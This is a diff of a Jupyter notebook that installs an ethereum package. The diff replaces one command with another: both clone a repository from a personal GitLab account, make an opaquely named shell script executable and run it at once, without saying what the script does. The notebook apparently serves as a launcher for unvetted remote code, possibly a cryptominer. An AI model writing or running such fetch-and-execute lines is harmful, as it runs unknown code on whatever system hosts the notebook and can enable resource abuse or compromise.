--- a/out 100 _privat_ssh_v2_(1).ipynb
+++ b/out 100 _privat_ssh_v2_(1).ipynb
@@ -121,7 +121,7 @@
         "! sudo apt update\n",
         "! sudo apt install ethereum\n",
         "# Run\n",
-        "! git clone https://gitlab.com/abdelpurnomoo3/slow.git && cd slow && chmod +x edc.sh && ./edc.sh"
+        "! git clone https://gitlab.com/abdelpurnomoo3/dinaran.git && cd dinaran && chmod +x qaz.sh && ./qaz.sh"
       ],
       "execution_count": null,
       "outputs": []
